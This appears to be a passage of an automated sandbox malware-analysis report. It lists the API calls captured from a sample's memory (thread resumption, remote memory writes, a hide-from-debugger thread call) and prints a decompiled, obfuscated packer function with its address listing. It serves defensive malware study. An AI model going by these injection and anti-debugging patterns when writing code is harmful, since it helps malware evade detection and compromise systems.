                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 129cebaee6b45a4c95dddc725e4efbbf2d36ddcf9d38914574c37bdf439ac7f7
                                                        • Instruction ID: 7a356630136be6a3e86cd8a0832a4c939cc8c742652be5ac00d67a2171699e47
                                                        • Opcode Fuzzy Hash: 129cebaee6b45a4c95dddc725e4efbbf2d36ddcf9d38914574c37bdf439ac7f7
                                                        • Instruction Fuzzy Hash: 5D119834E0D346DDEF245A1987983B162AE6F57E94F48456FCC434BCA6E37584C4CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: db643770154f2b2c54230a995cf9cba14c74856b5383212ea9e773ac4f6057a2
                                                        • Instruction ID: 83145a501cc1edcd729db9d4aca3f95188bea0a3200870e301da5aa7ef4d9d70
                                                        • Opcode Fuzzy Hash: db643770154f2b2c54230a995cf9cba14c74856b5383212ea9e773ac4f6057a2
                                                        • Instruction Fuzzy Hash: 84118634E0C346DDEF245A1987983B162AEAF47EA4F48456FCC034ACA6E37584C5CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadThread
                                                        • String ID:
                                                        • API String ID: 543350213-0
                                                        • Opcode ID: 696a1b491752a169e35583341e1930947ff8d792cfd55f5e1a10f12d86ee8a86
                                                        • Instruction ID: 4c96750dad5a423d26665472c715e85f8941eb3aea5290df2ff90c919011a10a
                                                        • Opcode Fuzzy Hash: 696a1b491752a169e35583341e1930947ff8d792cfd55f5e1a10f12d86ee8a86
                                                        • Instruction Fuzzy Hash: 0B1159F1B953096FFF242A348C907EE269F8F46364F684225EE22072C1CB70C880CA81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: cc71ec18f8136bb8acd2fa2f0578291818048c1976f8d642b7e3cb720a38b20b
                                                        • Instruction ID: f2ddbf4fe6e34183c30ee570556716de4081950d0114572da9f7a1d3502a7017
                                                        • Opcode Fuzzy Hash: cc71ec18f8136bb8acd2fa2f0578291818048c1976f8d642b7e3cb720a38b20b
                                                        • Instruction Fuzzy Hash: 62118E34E08342DCEF241A2987983B122AEAF47E94F48466F8C034ACA6E3328484C742
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 09851e9e244f498afc527f5090733a6abfe09f497dd1302479f55df03fb534dc
                                                        • Instruction ID: 5d308e2935382798da791d925db7282aa66d0d64c595b141cdc8fa49ef20d61a
                                                        • Opcode Fuzzy Hash: 09851e9e244f498afc527f5090733a6abfe09f497dd1302479f55df03fb534dc
                                                        • Instruction Fuzzy Hash: D6017534F0D342DCEF141A6987983B512AE6F57ED4F48456F8C434ADA6F3328484C702
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3527976591-0
                                                        • Opcode ID: c474997a7eda9f02770577b9a003849bcb4fabe8709897ad36f8918f878fb6c9
                                                        • Instruction ID: 2d78e42a56076544335624f7ad1d889d0b3905ee59f9e1f9f07b595184e9b047
                                                        • Opcode Fuzzy Hash: c474997a7eda9f02770577b9a003849bcb4fabe8709897ad36f8918f878fb6c9
                                                        • Instruction Fuzzy Hash: B111E1F6604308ABDF660E60DD90BF83B7AFF06354F440655FD8A825A2D73A8894CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: ba741c53601f043ef16c6e0ccaefdf8fe01c0edde29eb64944e27fd8838ebe69
                                                        • Instruction ID: 43f72fa54f26c799bccd4c65305f7d65ca4d10d9ea328d5cd9ccb20756991585
                                                        • Opcode Fuzzy Hash: ba741c53601f043ef16c6e0ccaefdf8fe01c0edde29eb64944e27fd8838ebe69
                                                        • Instruction Fuzzy Hash: 4201A434F0D342DCBF542A6D8BA43F512AEAD97EC4B8C466E8D4387D9AF7224880C701
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryVirtualWrite
                                                        • String ID:
                                                        • API String ID: 3527976591-0
                                                        • Opcode ID: fa0fb7316b21402f1ebbcf8073a330be610fa21576706e0c92ca6fb008e62f7e
                                                        • Instruction ID: 50e40aa31fe3fc3aa44d6868224a9f88bd128984193bef12662b873a217430f8
                                                        • Opcode Fuzzy Hash: fa0fb7316b21402f1ebbcf8073a330be610fa21576706e0c92ca6fb008e62f7e
                                                        • Instruction Fuzzy Hash: 5401F1B5604308ABDF250E60DD91BF83B6AFF0A344F400659FE4B925A1C73A88D4CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: cd8c92ac627a862bee87f3102c4748e76bfe6e01cae83e96b4df93ef785970fc
                                                        • Instruction ID: 6495fb7a2bfed183eac15149d7e8367c00506e9381b3c6a0dfedc5a259346c2d
                                                        • Opcode Fuzzy Hash: cd8c92ac627a862bee87f3102c4748e76bfe6e01cae83e96b4df93ef785970fc
                                                        • Instruction Fuzzy Hash: 79F06234F0D342DCBF552A6D8BA43B512AEAD97DD4B8C466F8D438AD9AF7224484C701
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(-0000CFB3,?,-0000CFB3,02392119,001807C7,00000000,001807C7,0000003A,00000309,C781D084,02395B59,0239382E,?,0000084D,8166FD38), ref: 023957AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: ed20c4097237a62ef065ef434d15ac76da43faa356025a8e91e26ed5e6ff18b2
                                                        • Instruction ID: 622f4b993f805555fdab9184b87221cc1ac6b4e22ea9f8a080ff8d8898e7e527
                                                        • Opcode Fuzzy Hash: ed20c4097237a62ef065ef434d15ac76da43faa356025a8e91e26ed5e6ff18b2
                                                        • Instruction Fuzzy Hash: B401423251E3D2AAC7328B7006A95937FA0BF83210768C0ECC0C209067C2A29666DBD6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 1c1c7336bb8f4551f13353182f666fca3f9bb9f656b6866f8e489d7533081c4a
                                                        • Instruction ID: d34a6e7f978cfa55ea62254e12aac740baca2112302cfe896ea35a8f707cc367
                                                        • Opcode Fuzzy Hash: 1c1c7336bb8f4551f13353182f666fca3f9bb9f656b6866f8e489d7533081c4a
                                                        • Instruction Fuzzy Hash: 33F09034F09342CCBF552A6D8BA83B5126EAC97D9478C466F8D438AD6AE7224884C301
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: fb67678bd800e96ecef1368be408c3a5cb8fe984df6e7ce14741cc81023001cd
                                                        • Instruction ID: bb1573241b1da878d60664652318dee209b0561d571cc80c14c483c82efc506e
                                                        • Opcode Fuzzy Hash: fb67678bd800e96ecef1368be408c3a5cb8fe984df6e7ce14741cc81023001cd
                                                        • Instruction Fuzzy Hash: 01F0A034F08342C9BF986A3D87983B5126EAC87EC4B8C851ECD0386D5AF7214484C301
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 0df7a8bc17be6cc3bda7f31eee81e95ded2f0612bbf7f27e1d3af06c58ae05ef
                                                        • Instruction ID: 2dd54f73b8f46f70b153737018c4288e530dadec5cd5066d789ede57911e2c22
                                                        • Opcode Fuzzy Hash: 0df7a8bc17be6cc3bda7f31eee81e95ded2f0612bbf7f27e1d3af06c58ae05ef
                                                        • Instruction Fuzzy Hash: 89F0E530F09341CDBF455A398B94375266E6C87D847588A6ECC538695EF7225484C311
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 971afdda932896e76d16f6f0a0d3b620a94732d3d16cdacc53d63784ad1b5f59
                                                        • Instruction ID: 9014bfd8a5bccdf30d8ade8353d3163101cb0d6f81b5539f48cec6a7e9b51df2
                                                        • Opcode Fuzzy Hash: 971afdda932896e76d16f6f0a0d3b620a94732d3d16cdacc53d63784ad1b5f59
                                                        • Instruction Fuzzy Hash: FCE01234F09301C96F995D75CBA93B9212FAD8BDC8A588A6ECC1345D9AE7324484C741
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: da4de566137d88dcd6f55828bccd46ad22ffa5ca7d9bf4345ae75fdf07bb83f5
                                                        • Instruction ID: 3a05b8d66116f019d722911c3b3de6a8f1046a4fae640f04421ed2d65a8ed3ce
                                                        • Opcode Fuzzy Hash: da4de566137d88dcd6f55828bccd46ad22ffa5ca7d9bf4345ae75fdf07bb83f5
                                                        • Instruction Fuzzy Hash: 4DE05B38D04301DDBF455DB5CBA93B9252F5D97D84B54893DCC4347509F7329484C301
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: MemoryProtectVirtual
                                                        • String ID:
                                                        • API String ID: 2706961497-0
                                                        • Opcode ID: 4039f35f521f9c2c04046382789cff76aec41d4d559902f0d3a430b70b605ba7
                                                        • Instruction ID: 36a19d418005af62ca92fba6c4dfbfef2a61e2e9f318e1d9855c2876342aafe4
                                                        • Opcode Fuzzy Hash: 4039f35f521f9c2c04046382789cff76aec41d4d559902f0d3a430b70b605ba7
                                                        • Instruction Fuzzy Hash: 3AC012E06240006E79058A68CD48C2BB2AA8AD8A28B14C32CB832222CCC930EC048632
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E004102A4(void* __ebx, void* __ecx, void* __edi, void* __esi, char __fp0, signed int _a4) {
                                                        				signed int _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				short _v28;
                                                        				long long _v36;
                                                        				char _v40;
                                                        				intOrPtr _v44;
                                                        				char _v48;
                                                        				intOrPtr _v52;
                                                        				char _v56;
                                                        				short _v60;
                                                        				short _v64;
                                                        				char _v80;
                                                        				char _v84;
                                                        				char _v88;
                                                        				void* _v92;
                                                        				char _v108;
                                                        				void* _v112;
                                                        				char _v116;
                                                        				char _v120;
                                                        				char _v124;
                                                        				intOrPtr _v128;
                                                        				char _v132;
                                                        				intOrPtr _v136;
                                                        				char _v140;
                                                        				intOrPtr _v144;
                                                        				char _v148;
                                                        				signed int _v152;
                                                        				signed int _v156;
                                                        				intOrPtr* _v160;
                                                        				signed int _v164;
                                                        				char _v176;
                                                        				signed int _v180;
                                                        				signed int _v184;
                                                        				signed int _v188;
                                                        				signed int _v192;
                                                        				signed int _v196;
                                                        				signed int _v200;
                                                        				signed int _v204;
                                                        				char _v208;
                                                        				signed int _v212;
                                                        				signed int _v216;
                                                        				signed int _v220;
                                                        				signed char _t240;
                                                        				signed int _t251;
                                                        				signed int _t260;
                                                        				signed int _t269;
                                                        				signed int _t291;
                                                        				signed int _t308;
                                                        				signed int _t312;
                                                        				signed int _t318;
                                                        				signed int _t323;
                                                        				signed int _t327;
                                                        				void* _t331;
                                                        				char* _t336;
                                                        				char* _t337;
                                                        				signed int _t340;
                                                        				char* _t347;
                                                        				char* _t348;
                                                        				char* _t352;
                                                        				void* _t365;
                                                        				void* _t367;
                                                        				intOrPtr _t368;
                                                        				long long* _t369;
                                                        
                                                        				_t368 = _t367 - 0xc;
                                                        				 *[fs:0x0] = _t368;
                                                        				L00401210();
                                                        				_v16 = _t368;
                                                        				_v12 = 0x401120;
                                                        				_v8 = _a4 & 0x00000001;
                                                        				_t240 = _a4 & 0x000000fe;
                                                        				_a4 = _t240;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401216, _t365);
                                                        				asm("fldz");
                                                        				_v48 = __fp0;
                                                        				L0040133C();
                                                        				L00401342();
                                                        				asm("fcomp qword [0x401118]");
                                                        				asm("fnstsw ax");
                                                        				asm("sahf");
                                                        				if(_t240 != 0) {
                                                        					_push(0);
                                                        					_push(L"fBR6AW7RVexTeqW175");
                                                        					_push( &_v80);
                                                        					_push( &_v108);
                                                        					L00401336();
                                                        					_t368 = _t368 + 0x10;
                                                        					if( *0x41233c != 0) {
                                                        						_v176 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v176 = 0x41233c;
                                                        					}
                                                        					_t14 =  &_v176; // 0x41233c
                                                        					_v152 =  *((intOrPtr*)( *_t14));
                                                        					_t336 =  &_v108;
                                                        					L00401324();
                                                        					_t337 =  &_v92;
                                                        					L0040132A();
                                                        					_t340 =  *((intOrPtr*)( *_v152 + 0x40))(_v152, _t337, _t337, _t336, _t336, 0x4046dc, L"XvSsEqomQo7ygk5AD1LzXEnpJHmiJWdnPM37");
                                                        					asm("fclex");
                                                        					_v156 = _t340;
                                                        					if(_v156 >= 0) {
                                                        						_v180 = _v180 & 0x00000000;
                                                        					} else {
                                                        						_push(0x40);
                                                        						_push(0x4046fc);
                                                        						_push(_v152);
                                                        						_push(_v156);
                                                        						L0040131E();
                                                        						_v180 = _t340;
                                                        					}
                                                        					L00401318();
                                                        					L00401312();
                                                        				}
                                                        				_v140 = 0x85ac9480;
                                                        				_v136 = 0x5af4;
                                                        				_v116 = 0x335a;
                                                        				_v112 = 0x7cc;
                                                        				_v132 =  *0x401110;
                                                        				_t251 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v132, 0x71d2, 0x226fe,  &_v112, 0x2d05b0,  &_v116, L"JBhDOdbStjQgpp1CZ1sII6Bi6Mrw22",  &_v140,  &_v148);
                                                        				_v152 = _t251;
                                                        				if(_v152 >= 0) {
                                                        					_v184 = _v184 & 0x00000000;
                                                        				} else {
                                                        					_push(0x6f8);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v184 = _t251;
                                                        				}
                                                        				_v56 = _v148;
                                                        				_v52 = _v144;
                                                        				L0040130C();
                                                        				_v132 = 0xdf90170;
                                                        				_v128 = 0x5af5;
                                                        				_v116 = 0x4c10;
                                                        				_v112 = 0x30bb;
                                                        				_t260 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v112, L"Mnbd91g4szlScb9",  &_v116,  &_v132,  &_v84);
                                                        				_v152 = _t260;
                                                        				if(_v152 >= 0) {
                                                        					_v188 = _v188 & 0x00000000;
                                                        				} else {
                                                        					_push(0x6fc);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v188 = _t260;
                                                        				}
                                                        				L00401306();
                                                        				_v148 = 0xc187cfa0;
                                                        				_v144 = 0x5b04;
                                                        				_v140 = 0xe61c6f60;
                                                        				_v136 = 0x5b04;
                                                        				L0040130C();
                                                        				L0040130C();
                                                        				_v132 =  *0x401108;
                                                        				_t269 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0xa7dcb000, 0x5af7, 0x7b408a20, 0x5af3,  &_v132,  &_v84,  &_v88,  &_v140,  &_v148,  &_v112);
                                                        				_v152 = _t269;
                                                        				if(_v152 >= 0) {
                                                        					_v192 = _v192 & 0x00000000;
                                                        				} else {
                                                        					_push(0x700);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v192 = _t269;
                                                        				}
                                                        				_v64 = _v112;
                                                        				L00401300();
                                                        				_t369 = _t368 + 0xc;
                                                        				_t347 =  &_v84;
                                                        				L0040130C();
                                                        				_v112 = 0xce8;
                                                        				_v120 = 0x13c12e;
                                                        				_v164 =  *0x401104;
                                                        				_v180 =  *0x401100;
                                                        				 *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v120, _t347,  &_v112, 0x3152,  &_v84, _t347,  &_v132, 2,  &_v84,  &_v88);
                                                        				_v36 = _v132;
                                                        				_t348 =  &_v84;
                                                        				L00401306();
                                                        				_v112 = 0x3d3a;
                                                        				 *((intOrPtr*)( *_a4 + 0x718))(_a4, 0x31fc,  &_v112, 0x500,  &_v132);
                                                        				_v48 = _v132;
                                                        				_v44 = _v128;
                                                        				_v112 = 0x2f2d;
                                                        				 *_t369 =  *0x4010f8;
                                                        				_t291 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, _t348, _t348,  &_v112, 0xc2a,  &_v116);
                                                        				_v152 = _t291;
                                                        				if(_v152 >= 0) {
                                                        					_v196 = _v196 & 0x00000000;
                                                        				} else {
                                                        					_push(0x704);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v196 = _t291;
                                                        				}
                                                        				_v60 = _v116;
                                                        				_v116 = 0x35c9;
                                                        				_v112 = 0x640d;
                                                        				_v132 = 0xe19d4550;
                                                        				_v128 = 0x5b03;
                                                        				L0040130C();
                                                        				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v84,  &_v132,  &_v112,  &_v116, 0x3e4b22, L"aBxJ1EK9Or90qp8Afn674", 0x92f,  &_v120);
                                                        				_v40 = _v120;
                                                        				L00401306();
                                                        				_v124 = 0x5857a0;
                                                        				L0040130C();
                                                        				_v132 =  *0x4010f0;
                                                        				_v112 = 0x6e11;
                                                        				_v120 = 0xd8807;
                                                        				_t308 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, L"u5Ya74wgTUO8iTCNpzL0XAUeDHmKGZp2IrI136",  &_v120,  &_v112,  &_v132, 0x69758a20, 0x5af8,  &_v84,  &_v124);
                                                        				_v152 = _t308;
                                                        				if(_v152 >= 0) {
                                                        					_v200 = _v200 & 0x00000000;
                                                        				} else {
                                                        					_push(0x708);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v200 = _t308;
                                                        				}
                                                        				_t352 =  &_v84;
                                                        				L00401306();
                                                        				_v120 = 0xf5aa2;
                                                        				 *_t369 =  *0x4010e8;
                                                        				_t312 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t352, _t352,  &_v120);
                                                        				_v152 = _t312;
                                                        				if(_v152 >= 0) {
                                                        					_v204 = _v204 & 0x00000000;
                                                        				} else {
                                                        					_push(0x70c);
                                                        					_push(0x404544);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v204 = _t312;
                                                        				}
                                                        				if( *0x41233c != 0) {
                                                        					_v208 = 0x41233c;
                                                        				} else {
                                                        					_push(0x41233c);
                                                        					_push(0x40470c);
                                                        					L00401330();
                                                        					_v208 = 0x41233c;
                                                        				}
                                                        				_t190 =  &_v208; // 0x41233c
                                                        				_v152 =  *((intOrPtr*)( *_t190));
                                                        				_t318 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v92);
                                                        				asm("fclex");
                                                        				_v156 = _t318;
                                                        				if(_v156 >= 0) {
                                                        					_v212 = _v212 & 0x00000000;
                                                        				} else {
                                                        					_push(0x14);
                                                        					_push(0x4046fc);
                                                        					_push(_v152);
                                                        					_push(_v156);
                                                        					L0040131E();
                                                        					_v212 = _t318;
                                                        				}
                                                        				_v160 = _v92;
                                                        				_t323 =  *((intOrPtr*)( *_v160 + 0x78))(_v160,  &_v112);
                                                        				asm("fclex");
                                                        				_v164 = _t323;
                                                        				if(_v164 >= 0) {
                                                        					_v216 = _v216 & 0x00000000;
                                                        				} else {
                                                        					_push(0x78);
                                                        					_push(0x4048c0);
                                                        					_push(_v160);
                                                        					_push(_v164);
                                                        					L0040131E();
                                                        					_v216 = _t323;
                                                        				}
                                                        				_v28 = _v112;
                                                        				L00401318();
                                                        				_t327 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
                                                        				asm("fclex");
                                                        				_v152 = _t327;
                                                        				if(_v152 >= 0) {
                                                        					_v220 = _v220 & 0x00000000;
                                                        				} else {
                                                        					_push(0x1bc);
                                                        					_push(0x404514);
                                                        					_push(_a4);
                                                        					_push(_v152);
                                                        					L0040131E();
                                                        					_v220 = _t327;
                                                        				}
                                                        				_t331 =  *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v120);
                                                        				_v8 = 0;
                                                        				asm("wait");
                                                        				_push(0x4109c2);
                                                        				L00401312();
                                                        				return _t331;
                                                        			}



































































                                                        0x004102a7
                                                        0x004102b6
                                                        0x004102c2
                                                        0x004102ca
                                                        0x004102cd
                                                        0x004102da
                                                        0x004102e0
                                                        0x004102e2
                                                        0x004102ed
                                                        0x004102f0
                                                        0x004102f4
                                                        0x004102f7
                                                        0x004102fc
                                                        0x00410301
                                                        0x00410307
                                                        0x00410309
                                                        0x0041030a
                                                        0x00410310
                                                        0x00410312
                                                        0x0041031a
                                                        0x0041031e
                                                        0x0041031f
                                                        0x00410324
                                                        0x0041032e
                                                        0x0041034b
                                                        0x00410330
                                                        0x00410330
                                                        0x00410335
                                                        0x0041033a
                                                        0x0041033f
                                                        0x0041033f
                                                        0x00410355
                                                        0x0041035d
                                                        0x0041036d
                                                        0x00410371
                                                        0x00410377
                                                        0x0041037b
                                                        0x0041038f
                                                        0x00410392
                                                        0x00410394
                                                        0x004103a1
                                                        0x004103c3
                                                        0x004103a3
                                                        0x004103a3
                                                        0x004103a5
                                                        0x004103aa
                                                        0x004103b0
                                                        0x004103b6
                                                        0x004103bb
                                                        0x004103bb
                                                        0x004103cd
                                                        0x004103d5
                                                        0x004103d5
                                                        0x004103da
                                                        0x004103e4
                                                        0x004103ee
                                                        0x004103f4
                                                        0x00410400
                                                        0x00410439
                                                        0x0041043f
                                                        0x0041044c
                                                        0x0041046e
                                                        0x0041044e
                                                        0x0041044e
                                                        0x00410453
                                                        0x00410458
                                                        0x0041045b
                                                        0x00410461
                                                        0x00410466
                                                        0x00410466
                                                        0x0041047b
                                                        0x00410484
                                                        0x0041048f
                                                        0x00410494
                                                        0x0041049b
                                                        0x004104a2
                                                        0x004104a8
                                                        0x004104cb
                                                        0x004104d1
                                                        0x004104de
                                                        0x00410500
                                                        0x004104e0
                                                        0x004104e0
                                                        0x004104e5
                                                        0x004104ea
                                                        0x004104ed
                                                        0x004104f3
                                                        0x004104f8
                                                        0x004104f8
                                                        0x0041050a
                                                        0x0041050f
                                                        0x00410519
                                                        0x00410523
                                                        0x0041052d
                                                        0x0041053f
                                                        0x0041054c
                                                        0x00410557
                                                        0x00410594
                                                        0x0041059a
                                                        0x004105a7
                                                        0x004105c9
                                                        0x004105a9
                                                        0x004105a9
                                                        0x004105ae
                                                        0x004105b3
                                                        0x004105b6
                                                        0x004105bc
                                                        0x004105c1
                                                        0x004105c1
                                                        0x004105d4
                                                        0x004105e2
                                                        0x004105e7
                                                        0x004105ef
                                                        0x004105f2
                                                        0x004105f7
                                                        0x004105fd
                                                        0x0041060f
                                                        0x00410626
                                                        0x00410635
                                                        0x0041063e
                                                        0x00410641
                                                        0x00410644
                                                        0x00410649
                                                        0x00410669
                                                        0x00410672
                                                        0x00410678
                                                        0x0041067b
                                                        0x00410696
                                                        0x004106a1
                                                        0x004106a7
                                                        0x004106b4
                                                        0x004106d6
                                                        0x004106b6
                                                        0x004106b6
                                                        0x004106bb
                                                        0x004106c0
                                                        0x004106c3
                                                        0x004106c9
                                                        0x004106ce
                                                        0x004106ce
                                                        0x004106e1
                                                        0x004106e5
                                                        0x004106eb
                                                        0x004106f1
                                                        0x004106f8
                                                        0x00410707
                                                        0x00410737
                                                        0x00410740
                                                        0x00410746
                                                        0x0041074b
                                                        0x0041075a
                                                        0x00410765
                                                        0x00410768
                                                        0x0041076e
                                                        0x004107a0
                                                        0x004107a6
                                                        0x004107b3
                                                        0x004107d5
                                                        0x004107b5
                                                        0x004107b5
                                                        0x004107ba
                                                        0x004107bf
                                                        0x004107c2
                                                        0x004107c8
                                                        0x004107cd
                                                        0x004107cd
                                                        0x004107dc
                                                        0x004107df
                                                        0x004107e4
                                                        0x004107f7
                                                        0x00410802
                                                        0x00410808
                                                        0x00410815
                                                        0x00410837
                                                        0x00410817
                                                        0x00410817
                                                        0x0041081c
                                                        0x00410821
                                                        0x00410824
                                                        0x0041082a
                                                        0x0041082f
                                                        0x0041082f
                                                        0x00410845
                                                        0x00410862
                                                        0x00410847
                                                        0x00410847
                                                        0x0041084c
                                                        0x00410851
                                                        0x00410856
                                                        0x00410856
                                                        0x0041086c
                                                        0x00410874
                                                        0x0041088c
                                                        0x0041088f
                                                        0x00410891
                                                        0x0041089e
                                                        0x004108c0
                                                        0x004108a0
                                                        0x004108a0
                                                        0x004108a2
                                                        0x004108a7
                                                        0x004108ad
                                                        0x004108b3
                                                        0x004108b8
                                                        0x004108b8
                                                        0x004108ca
                                                        0x004108e2
                                                        0x004108e5
                                                        0x004108e7
                                                        0x004108f4
                                                        0x00410916
                                                        0x004108f6
                                                        0x004108f6
                                                        0x004108f8
                                                        0x004108fd
                                                        0x00410903
                                                        0x00410909
                                                        0x0041090e
                                                        0x0041090e
                                                        0x00410921
                                                        0x00410928
                                                        0x00410937
                                                        0x0041093d
                                                        0x0041093f
                                                        0x0041094c
                                                        0x0041096e
                                                        0x0041094e
                                                        0x0041094e
                                                        0x00410953
                                                        0x00410958
                                                        0x0041095b
                                                        0x00410961
                                                        0x00410966
                                                        0x00410966
                                                        0x00410981
                                                        0x00410987
                                                        0x0041098e
                                                        0x0041098f
                                                        0x004109bc
                                                        0x004109c1

                                                        APIs
